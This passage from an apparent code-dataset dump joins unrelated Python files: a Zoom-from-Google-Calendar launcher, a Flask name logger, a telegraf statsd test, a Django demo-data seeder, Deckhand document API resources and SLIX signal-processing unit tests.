    # underflow/overflow into the hour so .replace() gets valid values.
    if mn-thres < 0:
        after = datetime.datetime.now().replace(hour=hr, minute=mn+thres)
        (hr, mn) = convert_time(hr, mn-thres)
        before = datetime.datetime.now().replace(hour=hr, minute=mn)
    elif mn+thres > 59:
        before = datetime.datetime.now().replace(hour=hr, minute=mn-thres)
        (hr, mn) = convert_time(hr, mn+thres)
        after = datetime.datetime.now().replace(hour=hr, minute=mn)
    else:
        before = datetime.datetime.now().replace(hour=hr, minute=mn-thres)
        after = datetime.datetime.now().replace(hour=hr, minute=mn+thres)
    # datetime.weekday(): Monday == 0; `day` holds the scheduled weekdays.
    today = datetime.datetime.now().weekday()
    if today in day and before <= datetime.datetime.now() <= after:
        print('right time to zoom')
        return True
def sliceLastOccur(string, char):
    """Return the part of *string* before the last character equal to *char*,
    or '' when no character matches."""
    last_idx = max((i for i, c in enumerate(string) if c == char), default=-1)
    return string[:last_idx] if last_idx != -1 else ''
def googleDatetimeConverter(dt):
    """Parse a Google Calendar RFC 3339 datetime string into a naive datetime.

    The text after the last '-' (the UTC offset) is stripped first.
    NOTE(review): assumes a '-HH:MM' offset suffix; a '+HH:MM' offset would
    not be stripped and strptime would fail — confirm against the calendar's
    timezone.
    """
    dt = sliceLastOccur(dt, '-')
    res = datetime.datetime.strptime(str(dt), '%Y-%m-%dT%H:%M:%S')
    return res
def openZoom(zoomLink):
    """Open *zoomLink* in a Chrome session that reuses the user's existing
    profile (so Zoom cookies/SSO are already in place)."""
    print(zoomLink)
    ch_options = Options()
    ch_options.add_argument('--no-sandbox')
    ### Type "chrome://version/" in google chrome and look for your profile path ###
    ch_options.add_argument('user-data-dir=/path/to/chrome/profile/')
    # webdriver-manager downloads a matching chromedriver on demand.
    driver = webdriver.Chrome(ChromeDriverManager().install(), options=ch_options)
    driver.get(zoomLink)
def gotZoom(link):
    """True when *link* looks like a Zoom URL (contains 'zoom')."""
    return 'zoom' in link
def googAuto(calendarId):
    """Scan *calendarId* for today's remaining events and open the first Zoom
    meeting whose start time is within +/-20 minutes of now.

    Handles the Google OAuth flow, caching credentials in token.pickle.
    """
    creds = None
    # Reuse previously cached OAuth credentials when available.
    if os.path.exists('token.pickle'):
        with open('token.pickle', 'rb') as token:
            creds = pickle.load(token)
    # If there are no (valid) credentials available, let the user log in.
    if not creds or not creds.valid:
        if creds and creds.expired and creds.refresh_token:
            creds.refresh(Request())
        else:
            ### follow this link https://developers.google.com/calendar/quickstart/python and enable google calendar API to get your credentials.json ###
            flow = InstalledAppFlow.from_client_secrets_file('/path/to/google/calendar/credentials.json', SCOPES)
            creds = flow.run_local_server(port=0)
        # Save the credentials for the next run
        with open('token.pickle', 'wb') as token:
            pickle.dump(creds, token)
    service = build('calendar', 'v3', credentials=creds)
    # Call the Calendar API
    now = datetime.datetime.now().isoformat() + 'Z'  # 'Z' indicates UTC time
    nowdt = datetime.datetime.now()
    # NOTE(review): nowDatetime is computed but never used below.
    nowDatetime = datetime.datetime.strptime(nowdt.isoformat(), '%Y-%m-%dT%X.%f')
    # Search window: from now until the end of today.
    maxtime = datetime.datetime.utcnow().replace(hour=23, minute=59, second=0).isoformat() + 'Z'
    print("Getting today's Zoom meetings..")
    events_result = service.events().list(calendarId=calendarId, timeMin=now, timeMax=maxtime, maxResults=10, singleEvents=True, orderBy='startTime').execute()
    events = events_result.get('items', [])
    timenow = datetime.datetime.now()
    meetings = []
    meetings_list = []
    # Template record for one meeting entry.
    dummy_dict = {'name': 'sample_name', 'startTime': 'sample_time', 'link': 'sample_link'}
    if not events:
        print('No upcoming Zooms found for today.')
    print("Today's events: ")
    for event in events:
        loc = event.get('location')
        # Only events whose location field carries a Zoom link are considered.
        if 'location' in event and gotZoom(loc):
            meetings = dummy_dict.copy()
            start = event['start'].get('dateTime')
            if start != None:
                pass
            else:
                # Recurring entries carry the time under originalStartTime.
                start = event['originalStartTime'].get('dateTime')
            start = googleDatetimeConverter(start)
            name = event['summary']
            meetings['name'] = name
            meetings['startTime'] = start
            meetings['link'] = event.get('location')
            print(meetings['name'])
            meetings_list.append(meetings)
    # Open the first meeting starting within +/-20 minutes of now.
    timeThres = datetime.timedelta(minutes=20)
    res = False
    for i in meetings_list:
        if ((i['startTime'] - timeThres) <= timenow <= (i['startTime'] + timeThres) and gotZoom(i['link'])):
            print('Starting', i['name'], '...')
            openZoom(i['link'])
            res = True
            break
        else:
            pass
    if res is False:
        print('no zooms now')
        time.sleep(1)
    print('Done')
# Script entry point: wait briefly, then run one scan of the primary calendar.
time.sleep(0.5)
googAuto('primary')
|
StarcoderdataPython
|
4838555
|
<filename>newlog.py
from flask import Flask, render_template, request, redirect, url_for
app = Flask(__name__)
# Module-level store of submitted names. Lives only for the process lifetime
# and is not shared across worker processes.
str1 = []

@app.route('/input')
def input():
    """Render the name-entry form.

    NOTE(review): this view shadows the builtin ``input`` — confirm nothing
    in this module needs the builtin.
    """
    return render_template('input.html')

@app.route('/log', methods=['POST'])
def log():
    """Record the POSTed name and redirect to the success page."""
    user = request.form['name']
    str1.append(user)
    return redirect(url_for('success'))

@app.route('/success')
def success():
    """Show every name submitted so far."""
    print(str1)
    return render_template('success.html', names = str1)

if __name__ == '__main__':
    # NOTE(review): debug='True' is the string 'True', not the boolean —
    # confirm whether real debug mode is intended.
    app.run(host='localhost', port=8080, debug='True')
|
StarcoderdataPython
|
3368462
|
<reponame>swipswaps/signalfx-agent<filename>tests/monitors/telegraf_statsd/telegraf_statsd_test.py<gh_stars>1-10
import re
import time
from functools import partial as p
import pytest
from tests.helpers.agent import Agent
from tests.helpers.assertions import has_datapoint_with_dim, has_datapoint_with_metric_name, regex_search_matches_output
from tests.helpers.util import send_udp_message, wait_for
pytestmark = [pytest.mark.windows, pytest.mark.telegraf_statsd, pytest.mark.telegraf]
# regex used to scrape the address and port that dogstatsd is listening on
STATSD_RE = re.compile(r"(?<=listener listening on:(?=(\s+)(?=(\d+.\d+.\d+.\d+)\:(\d+))))")
MONITOR_CONFIG = """
monitors:
- type: telegraf/statsd
protocol: udp
serviceAddress: "127.0.0.1:0"
parseDataDogTags: true
metricSeparator: '.'
"""
def test_telegraf_statsd():
    """End-to-end check: statsd datapoints with DataDog tags reach fake ingest,
    including the case of a valueless tag."""
    with Agent.run(MONITOR_CONFIG) as agent:
        # wait until the statsd plugin logs the address and port it is listening on
        assert wait_for(p(regex_search_matches_output, agent.get_output, STATSD_RE.search))
        # scrape the host and port that the statsd plugin is listening on
        regex_results = STATSD_RE.search(agent.output)
        host = regex_results.groups()[1]
        port = int(regex_results.groups()[2])
        # send datapoints to the statsd listener (repeated: UDP is lossy)
        for _ in range(0, 10):
            send_udp_message(host, port, "statsd.test.metric:55555|g|#dimension1:value1,dimension2:value2")
            time.sleep(1)
        # wait for fake ingest to receive the statsd metrics
        assert wait_for(p(has_datapoint_with_metric_name, agent.fake_services, "statsd.test.metric"))
        assert wait_for(
            p(has_datapoint_with_dim, agent.fake_services, "dimension1", "value1")
        ), "datapoint didn't have datadog tag"
        # send datapoints with an empty-valued datadog tag
        for _ in range(0, 10):
            send_udp_message(host, port, "dogstatsd.test.metric:55555|g|#dimension1:,dimension2:value2")
            time.sleep(1)
        assert wait_for(
            p(has_datapoint_with_metric_name, agent.fake_services, "dogstatsd.test.metric")
        ), "didn't report metric with valueless datadog tag"
|
StarcoderdataPython
|
3304856
|
# blank lines are not displayed
# Dump every record of compresult.csv to stdout.
import csv

# NOTE(review): the csv docs recommend open(..., newline='') and letting the
# reader translate line endings; newline='\r\n' here appears to be how the
# blank rows mentioned above are suppressed — confirm the input file really
# uses CRLF endings before changing it.
with open('compresult.csv',"r",newline='\r\n') as fhObj:
    cReader = csv.reader(fhObj)
    for rec in cReader:
        print(rec)
|
StarcoderdataPython
|
184471
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 31 17:25:51 2017
@author: misaka-wa
"""
# <Test> [preprocessing::BioParser]
from preprocess.BioParser import bio_parse

dataframe = bio_parse('./dssp/sources/1a00.dssp')
AA = dataframe.AA.map(lambda x:x.replace(' ', '')) # amino acid
Structure = dataframe.STRUCTURE # secondary structure

# <Test> [research::cython::n_gram], [research::n_gram]
from research.n_gram import make_gram
import numpy as np

# Smoke-test make_gram on a trivial vector of 2-grams.
x = np.array([1,2,3,4,5])
make_gram(x, 2)

# n_gram: build 5-grams over (amino acid, structure) pairs and flatten each window.
cases = np.array([AA, Structure]).T
res = [each_gram.T.flatten() for each_gram in make_gram(cases, 5)]

from research.specific_regular import specific_report
# NOTE(review): presumably selects windows with 'A' at offsets 1 and 2 —
# confirm specific_report's contract.
frequency = specific_report(res, {1:'A', 2:'A'})
print(frequency.values())
|
StarcoderdataPython
|
3320109
|
from django.core.management.base import BaseCommand
from django.db import transaction
from core.models import CategoryCampaing, TagCampaing
from core.models import Campaing, Like, News
from core.models import Reward, Payment, User, Raised
from core.models import Comment, SubComment, Currency
class Command(BaseCommand):
    """Management command that seeds demo data: tags, campaigns, likes,
    rewards, payments, news, comments and sub-comments.

    Assumes the referenced categories, users and currency already exist
    (e.g. loaded by earlier fixtures); everything is created inside a single
    transaction so a failure leaves the database unchanged.
    """
    help = 'create campaings'

    def success(self, message):
        """Write *message* to stdout in the success style."""
        return self.stdout.write(
            self.style.SUCCESS(message)
        )

    def warning(self, warning):
        """Write *warning* to stdout in the warning style."""
        return self.stdout.write(
            self.style.WARNING(warning)
        )

    def error(self, error):
        """Write *error* to stdout in the error style."""
        return self.stdout.write(
            self.style.ERROR(error)
        )

    def handle(self, *args, **options):
        """Create all demo records atomically."""
        self.warning(
            'if something goes wrong after fixtures installations,\
 pelase use: python manage.py flush.'
        )
        with transaction.atomic():
            """get a categories"""
            category_1 = CategoryCampaing.objects.get(id=1)
            category_2 = CategoryCampaing.objects.get(id=2)
            """get users"""
            user_creator_1 = User.objects.get(email='<EMAIL>')
            user_creator_2 = User.objects.get(email='<EMAIL>')
            user_contributor_1 = User.objects.get(email='<EMAIL>')
            user_contributor_2 = User.objects.get(email='<EMAIL>')
            currency_one = Currency.objects.get(id=1)
            """create tags"""
            tag_1 = TagCampaing.objects.create(
                name='Innovacion',
                slug='innovacion'
            )
            tag_2 = TagCampaing.objects.create(
                name='Nueva Tecnologia',
                slug='nueva-tecnologia'
            )
            tag_3 = TagCampaing.objects.create(
                name='Emprendiendo',
                slug='emprendiendo'
            )
            self.success('tags created')
            """create campaing"""
            campaing_1 = Campaing.objects.create(
                title='first campaing',
                slug='first-campaing',
                city='Bolivia Santa Cruz',
                budget=100,
                qty_days=50,
                facebook='facebook.com/firts1',
                twitter='twitter.com/first1',
                linkedin='linkedin.com/first1',
                instagram='instagram.com/first1',
                website='first1.com',
                video='https://www.youtube.com/watch?v=DCCDKQH7BmA',
                excerpt='this is a excerpt for this campaibng.',
                description='this is a lot description for this campaing',
                public_at='2020-12-03 12:52:00',
                status_campaing=1,
                is_complete=False,
                user=user_creator_1,
                currencies=currency_one,
                category=category_1
            )
            campaing_1.tags.add(tag_1, tag_3)
            campaing_2 = Campaing.objects.create(
                title='second campaing',
                slug='second-campaing',
                city='Bolivia La Paz',
                budget=300,
                qty_days=50,
                facebook='facebook.com/firts2',
                twitter='twitter.com/first2',
                linkedin='linkedin.com/first2',
                instagram='instagram.com/first2',
                website='first2.com',
                video='https://www.youtube.com/watch?v=DCCDKQH7BmA',
                excerpt='this is a excerpt for this campaibng.',
                description='this is a lot description for this campaing',
                public_at='2020-10-05 12:52:00',
                status_campaing=1,
                is_complete=False,
                user=user_creator_2,
                currencies=currency_one,
                category=category_2,
            )
            campaing_2.tags.add(tag_2, tag_1)
            self.success('campaing created.')
            """create likes"""
            like_one = Like.objects.create(
                liked=True,
                user=user_contributor_1,
                campaing=campaing_1
            )
            like_two = Like.objects.create(
                liked=True,
                user=user_contributor_1,
                campaing=campaing_2
            )
            like_three = Like.objects.create(
                liked=True,
                user=user_contributor_2,
                campaing=campaing_1
            )
            self.success('likes created.')
            """create rewards"""
            reward_one = Reward.objects.create(
                title='reward camp 1',
                price=12.50,
                delivery_data='2020-02-20 12:45',
                delivery_place='somewhere',
                description='somewhere',
                campaing=campaing_1,
                currencies=currency_one
            )
            reward_two = Reward.objects.create(
                title='reward camp 1',
                price=123.50,
                delivery_data='2020-05-20 12:45',
                delivery_place='somewhere',
                description='somewhere',
                campaing=campaing_1,
                currencies=currency_one
            )
            reward_three = Reward.objects.create(
                title='reward camp 2',
                price=912.50,
                delivery_data='2020-06-22 12:45',
                delivery_place='somewhere',
                description='somewhere',
                campaing=campaing_2,
                currencies=currency_one
            )
            reward_four = Reward.objects.create(
                title='reward camp 2',
                price=668.50,
                delivery_data='2020-07-21 12:45',
                delivery_place='somewhere',
                description='somewhere',
                campaing=campaing_2,
                currencies=currency_one
            )
            self.success('rewards created.')
            """create payments"""
            payment_one = Payment.objects.create(
                name='paypal',
                campaing=campaing_1,
                reward=reward_one,
                user=user_contributor_1,
                type_payment=1,
                status_payment=3,
                budget_partial=reward_one.price,
                currencies=currency_one
            )
            payment_two = Payment.objects.create(
                name='paypal',
                campaing=campaing_1,
                reward=reward_two,
                user=user_contributor_1,
                type_payment=1,
                status_payment=3,
                budget_partial=reward_two.price,
                currencies=currency_one
            )
            payment_three = Payment.objects.create(
                name='paypal',
                campaing=campaing_2,
                reward=reward_three,
                user=user_contributor_1,
                type_payment=1,
                status_payment=2,
                budget_partial=reward_three.price,
                currencies=currency_one
            )
            self.success('payment created.')
            """news related a campaing"""
            news_1 = News.objects.create(
                title="some title",
                description="some description about campaing.",
                campaing=campaing_1
            )
            news_2= News.objects.create(
                title="some title two",
                description="some two description about campaing.",
                campaing=campaing_1
            )
            news_3= News.objects.create(
                title="some title three",
                description="some three description about campaing.",
                campaing=campaing_1
            )
            self.success('news created.')
            """comment about campaing"""
            comment_1 = Comment.objects.create(
                description="some comments about campaing.",
                created_at="2019-10-5 12:15",
                user=user_contributor_1
            )
            comment_2 = Comment.objects.create(
                description="some two comments about campaing.",
                created_at="2019-10-5 12:15",
                user=user_contributor_1
            )
            self.success('comments created.')
            """subcomment about comment"""
            sub_comment_1_1 = SubComment.objects.create(
                description="some answer about comment.",
                created_at="2019-5-5 12:23",
                comment=comment_1
            )
            sub_comment_1_2 = SubComment.objects.create(
                description="some two answer about comment.",
                created_at="2019-5-5 12:23",
                comment=comment_1
            )
            sub_comment_2_1 = SubComment.objects.create(
                description="some answer about comment above.",
                created_at="2019-6-5 12:12",
                comment=comment_2
            )
|
StarcoderdataPython
|
151592
|
# Generated by Django 4.0 on 2022-06-14 17:34
from django.db import migrations
class Migration(migrations.Migration):
    """Rename the evernote ``Note.tag`` field to ``Note.tags``."""

    dependencies = [
        ('evernote', '0009_note_tag_delete_notehastag'),
    ]

    operations = [
        migrations.RenameField(
            model_name='note',
            old_name='tag',
            new_name='tags',
        ),
    ]
|
StarcoderdataPython
|
1788001
|
# Copyright 2017 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import falcon
from oslo_log import log as logging
import six
from deckhand.control import base as api_base
from deckhand.control import common
from deckhand.control.views import document as document_view
from deckhand.db.sqlalchemy import api as db_api
from deckhand.engine import document_validation
from deckhand.engine import layering
from deckhand import errors
from deckhand import policy
from deckhand import types
from deckhand import utils
LOG = logging.getLogger(__name__)
class RevisionDocumentsResource(api_base.BaseResource):
    """API resource for realizing revision documents endpoint."""

    view_builder = document_view.ViewBuilder()

    @policy.authorize('deckhand:list_cleartext_documents')
    @common.sanitize_params([
        'schema', 'metadata.name', 'metadata.layeringDefinition.abstract',
        'metadata.layeringDefinition.layer', 'metadata.label',
        'status.bucket', 'order', 'sort'])
    def on_get(self, req, resp, sanitized_params, revision_id):
        """Returns all documents for a `revision_id`.

        Returns a multi-document YAML response containing all the documents
        matching the filters specified via query string parameters. Returned
        documents will be as originally posted with no substitutions or
        layering applied.
        """
        # Encrypted documents are only included for callers that hold the
        # corresponding policy; do_raise=False turns denial into exclusion.
        include_encrypted = policy.conditional_authorize(
            'deckhand:list_encrypted_documents', req.context, do_raise=False)
        order_by = sanitized_params.pop('order', None)
        sort_by = sanitized_params.pop('sort', None)

        filters = sanitized_params.copy()
        filters['metadata.storagePolicy'] = ['cleartext']
        if include_encrypted:
            filters['metadata.storagePolicy'].append('encrypted')
        filters['deleted'] = False  # Never return deleted documents to user.

        try:
            documents = db_api.revision_documents_get(
                revision_id, **filters)
        except errors.RevisionNotFound as e:
            LOG.exception(six.text_type(e))
            raise falcon.HTTPNotFound(description=e.format_message())

        # Sorts by creation date by default.
        documents = utils.multisort(documents, sort_by, order_by)

        resp.status = falcon.HTTP_200
        resp.body = self.view_builder.list(documents)
class RenderedDocumentsResource(api_base.BaseResource):
    """API resource for realizing rendered documents endpoint.

    Rendered documents are also revision documents, but unlike revision
    documents, they are finalized documents, having undergone secret
    substitution and document layering.

    Returns a multi-document YAML response containing all the documents
    matching the filters specified via query string parameters. Returned
    documents will have secrets substituted into them and be layered with
    other documents in the revision, in accordance with the ``LayeringPolicy``
    that currently exists in the system.
    """

    view_builder = document_view.ViewBuilder()

    @policy.authorize('deckhand:list_cleartext_documents')
    @common.sanitize_params([
        'schema', 'metadata.name', 'metadata.label', 'status.bucket', 'order',
        'sort'])
    def on_get(self, req, resp, sanitized_params, revision_id):
        """Render and return all documents for ``revision_id``."""
        include_encrypted = policy.conditional_authorize(
            'deckhand:list_encrypted_documents', req.context, do_raise=False)
        filters = {
            'metadata.storagePolicy': ['cleartext'],
            'deleted': False
        }
        if include_encrypted:
            filters['metadata.storagePolicy'].append('encrypted')

        documents = self._retrieve_documents_for_rendering(revision_id,
                                                           **filters)
        substitution_sources = self._retrieve_substitution_sources()

        try:
            # NOTE(fmontei): `validate` is False because documents have
            # already been pre-validated during ingestion. Documents are
            # post-validated below, regardless.
            document_layering = layering.DocumentLayering(
                documents, substitution_sources, validate=False)
            rendered_documents = document_layering.render()
        except (errors.InvalidDocumentLayer,
                errors.InvalidDocumentParent,
                errors.IndeterminateDocumentParent,
                errors.MissingDocumentKey,
                errors.UnsupportedActionMethod) as e:
            raise falcon.HTTPBadRequest(description=e.format_message())
        except (errors.LayeringPolicyNotFound,
                errors.SubstitutionSourceNotFound) as e:
            raise falcon.HTTPConflict(description=e.format_message())
        # FIX: was `errors.errors.UnknownSubstitutionError` — a nonexistent
        # attribute path that raised AttributeError during exception matching
        # instead of returning HTTP 500 for substitution failures.
        except errors.UnknownSubstitutionError as e:
            raise falcon.HTTPInternalServerError(
                description=e.format_message())

        # Filters to be applied post-rendering, because many documents are
        # involved in rendering. User filters can only be applied once all
        # documents have been rendered. Note that `layering` module only
        # returns concrete documents, so no filtering for that is needed here.
        order_by = sanitized_params.pop('order', None)
        sort_by = sanitized_params.pop('sort', None)
        user_filters = sanitized_params.copy()

        rendered_documents = [
            d for d in rendered_documents if utils.deepfilter(
                d, **user_filters)]

        if sort_by:
            rendered_documents = utils.multisort(
                rendered_documents, sort_by, order_by)

        resp.status = falcon.HTTP_200
        resp.body = self.view_builder.list(rendered_documents)
        self._post_validate(rendered_documents)

    def _retrieve_documents_for_rendering(self, revision_id, **filters):
        """Retrieve all necessary documents needed for rendering. If a layering
        policy isn't found in the current revision, retrieve it in a subsequent
        call and add it to the list of documents.
        """
        try:
            documents = db_api.revision_documents_get(revision_id, **filters)
        except errors.RevisionNotFound as e:
            LOG.exception(six.text_type(e))
            raise falcon.HTTPNotFound(description=e.format_message())

        if not any([d['schema'].startswith(types.LAYERING_POLICY_SCHEMA)
                    for d in documents]):
            try:
                layering_policy_filters = {
                    'deleted': False,
                    'schema': types.LAYERING_POLICY_SCHEMA
                }
                layering_policy = db_api.document_get(
                    **layering_policy_filters)
            except errors.DocumentNotFound as e:
                LOG.exception(e.format_message())
            else:
                documents.append(layering_policy)

        return documents

    def _retrieve_substitution_sources(self):
        """Return all concrete documents as potential substitution sources."""
        return db_api.document_get_all(
            **{'metadata.layeringDefinition.abstract': False})

    def _post_validate(self, rendered_documents):
        """Schema-validate documents post-rendering to ensure that rendering
        and substitution didn't break anything."""
        data_schemas = db_api.revision_documents_get(
            schema=types.DATA_SCHEMA_SCHEMA, deleted=False)
        doc_validator = document_validation.DocumentValidation(
            rendered_documents, data_schemas)
        try:
            validations = doc_validator.validate_all()
        except errors.InvalidDocumentFormat as e:
            LOG.error('Failed to post-validate rendered documents.')
            LOG.exception(e.format_message())
            raise falcon.HTTPInternalServerError(
                description=e.format_message())
        else:
            failed_validations = [
                v for v in validations if v['status'] == 'failure']
            if failed_validations:
                raise falcon.HTTPBadRequest(description=failed_validations)
|
StarcoderdataPython
|
3212878
|
<gh_stars>0
from SLIX.toolbox import *
class TestToolbox:
    def test_all_peaks(self):
        """all_peaks finds every local maximum; cut_edges drops border peaks."""
        # Create an absolute simple peak array
        arr = numpy.array([0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0])
        real_peaks = numpy.argwhere(arr == 1).flatten()
        toolbox_peaks = all_peaks(arr, cut_edges=False)
        assert numpy.all(toolbox_peaks == real_peaks)
        # cut_edges should remove the peak position 1
        toolbox_peaks = all_peaks(arr)
        assert numpy.all(toolbox_peaks == real_peaks[1:])
    def test_peak_positions(self):
        """Prominence bounds split peaks into high (1.0) and low (0.07) sets."""
        # Create an absolute simple peak array
        arr = numpy.array([0, 1, 0, 0.07, 0, 1, 0, 0.07, 0, 1, 0])
        # Test if high and low prominence separation is working as intended
        high_peaks = numpy.argwhere(arr == 1).flatten()
        low_peaks = numpy.argwhere(arr == 0.07).flatten()
        toolbox_peaks = all_peaks(arr, cut_edges=False)
        toolbox_high_peaks = accurate_peak_positions(toolbox_peaks, arr, centroid_calculation=False)
        toolbox_low_peaks = accurate_peak_positions(toolbox_peaks, arr, low_prominence=0, high_prominence=TARGET_PROMINENCE,
                                                    centroid_calculation=False)
        assert numpy.all(high_peaks == toolbox_high_peaks)
        assert numpy.all(low_peaks == toolbox_low_peaks)
    def test_peakdistance(self):
        """Two peaks 5 samples apart over 24 samples -> 75 degrees."""
        test_arr = numpy.array([0, 0, 1, 0, 0, 0, 0, 1, 0] + [0] * 15)
        expected_distance = 75
        toolbox_peaks = all_peaks(test_arr, cut_edges=False)
        toolbox_distance = peakdistance(toolbox_peaks, 24)
        assert toolbox_distance == expected_distance
    def test_prominence(self):
        """Mean prominence matches the mean of the normalized nonzero values."""
        # Create an absolute simple peak array
        test_arr = numpy.array([0, 1, 0, 0.1, 0, 1, 0, 0.1, 0, 1, 0])
        comparison = normalize(test_arr, kind_of_normalization=1)
        toolbox_peaks = all_peaks(test_arr, cut_edges=False)
        toolbox_prominence = prominence(toolbox_peaks, test_arr,)
        assert numpy.isclose(toolbox_prominence, numpy.mean(comparison[comparison > 0]))
    def test_peakwidth(self):
        """A triangular peak 2 samples wide over 24 samples -> 30 degrees."""
        test_arr = numpy.array([0, 0.5, 1, 0.5, 0] + [0] * 19)
        expected_width = 30
        toolbox_peaks = all_peaks(test_arr, cut_edges=False)
        toolbox_width = peakwidth(toolbox_peaks, test_arr, 24)
        assert toolbox_width == expected_width
def test_crossing_direction(self):
# Test for one direction with 180°+-35° distance
two_peak_arr = numpy.array([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0])
expected_direction = numpy.array([135, BACKGROUND_COLOR, BACKGROUND_COLOR])
peaks = all_peaks(two_peak_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, two_peak_arr, centroid_calculation=False)
toolbox_direction = crossing_direction(high_peaks, len(two_peak_arr))
assert numpy.all(expected_direction == toolbox_direction)
# Test for two directions with 180°+-35° distance
four_peak_arr = numpy.array([0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0])
expected_direction = numpy.array([135, 60, BACKGROUND_COLOR])
peaks = all_peaks(four_peak_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, four_peak_arr, centroid_calculation=False)
toolbox_direction = crossing_direction(high_peaks, len(two_peak_arr))
assert numpy.all(expected_direction == toolbox_direction)
# Test for three directions with 180°+-35° distance
six_peak_arr = numpy.array([0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0])
expected_direction = numpy.array([135, 105, 60])
peaks = all_peaks(six_peak_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, six_peak_arr, centroid_calculation=False)
toolbox_direction = crossing_direction(high_peaks, len(two_peak_arr))
assert numpy.all(expected_direction == toolbox_direction)
# Test for angle outside of 180°+-35° distance
error_arr = numpy.array([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0])
expected_direction = numpy.array([82.5, BACKGROUND_COLOR, BACKGROUND_COLOR])
peaks = all_peaks(error_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, error_arr, centroid_calculation=False)
toolbox_direction = crossing_direction(high_peaks, len(error_arr))
assert numpy.all(expected_direction == toolbox_direction)
error_arr = numpy.array([0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0])
expected_direction = numpy.array([BACKGROUND_COLOR, BACKGROUND_COLOR, 60])
peaks = all_peaks(error_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, error_arr, centroid_calculation=False)
toolbox_direction = crossing_direction(high_peaks, len(error_arr))
assert numpy.all(expected_direction == toolbox_direction)
def test_non_crossing_direction(self):
# Test for one peak
one_peak_arr = numpy.array([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
expected_direction = 45
peaks = all_peaks(one_peak_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, one_peak_arr, centroid_calculation=False)
toolbox_direction = non_crossing_direction(high_peaks, len(one_peak_arr))
assert expected_direction == toolbox_direction
# Test for two peaks
two_peak_arr = numpy.array([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0])
expected_direction = 135
peaks = all_peaks(two_peak_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, two_peak_arr, centroid_calculation=False)
toolbox_direction = non_crossing_direction(high_peaks, len(two_peak_arr))
assert expected_direction == toolbox_direction
# Test for four peaks
four_peak_arr = numpy.array([0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0])
expected_direction = BACKGROUND_COLOR
peaks = all_peaks(four_peak_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, four_peak_arr, centroid_calculation=False)
toolbox_direction = non_crossing_direction(high_peaks, len(two_peak_arr))
assert expected_direction == toolbox_direction
def test_centroid_correction(self):
# simple test case: one distinct peak
test_array = numpy.array([0] * 9 + [1] + [0] * 14)
test_high_peaks = numpy.array([9])
expected_centroid = numpy.array([9])
toolbox_centroid = centroid_correction(test_array, test_high_peaks)
assert expected_centroid == toolbox_centroid
# simple test case: one distinct peak
test_array = numpy.array([0] * 8 + [0.5, 1, 0.5] + [0] * 13)
test_high_peaks = numpy.array([9])
expected_centroid = numpy.array([9])
toolbox_centroid = centroid_correction(test_array, test_high_peaks)
assert expected_centroid == toolbox_centroid
# simple test case: centroid is between two measurements
test_array = numpy.array([0] * 8 + [1, 1] + [0] * 14)
test_high_peaks = numpy.array([8])
expected_centroid = numpy.array([8.5])
toolbox_centroid = centroid_correction(test_array, test_high_peaks)
assert expected_centroid == toolbox_centroid
# more complicated test case: wide peak plateau
test_array = numpy.array([0] * 8 + [1, 1, 1] + [0] * 13)
test_high_peaks = numpy.array([8])
expected_centroid = numpy.array([9])
toolbox_centroid = centroid_correction(test_array, test_high_peaks)
assert numpy.isclose(expected_centroid, toolbox_centroid, 1e-2, 1e-2)
def test_create_background_mask(self):
test_array = (numpy.random.random(10000) * 256).astype('int')
expected_results = test_array < 10
toolbox_mask = create_background_mask(test_array[..., numpy.newaxis])
assert numpy.all(expected_results == toolbox_mask)
def test_normalize(self):
test_array = numpy.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], dtype=numpy.float)
# Normalization kind == 0 -> Scale to 0..1
expected_array = test_array / test_array.max()
normalized_array = normalize(test_array)
assert numpy.all(numpy.isclose(expected_array, normalized_array))
# Normalization kind == 1 -> Divide by mean value of array
expected_array = test_array / test_array.mean()
normalized_array = normalize(test_array, kind_of_normalization=1)
assert numpy.all(numpy.isclose(expected_array, normalized_array))
def test_reshape_array_to_image(self):
test_array = numpy.array([i for i in range(0, 100)])
# Test reshape for no roi size
toolbox_image = reshape_array_to_image(test_array, 10, 1)
assert toolbox_image.shape == (10, 10)
# test if content of array is as expected
for i in range(0, 10):
for j in range(0, 10):
assert toolbox_image[i, j] == test_array[i * 10 + j]
# Test reshape for roi size of two
toolbox_image = reshape_array_to_image(test_array, 10, 2)
assert toolbox_image.shape == (5, 20)
for i in range(0, 5):
for j in range(0, 20):
assert toolbox_image[i, j] == test_array[i * 20 + j]
|
StarcoderdataPython
|
1720708
|
<reponame>shawwn/cpython
from . import basic, basic2
|
StarcoderdataPython
|
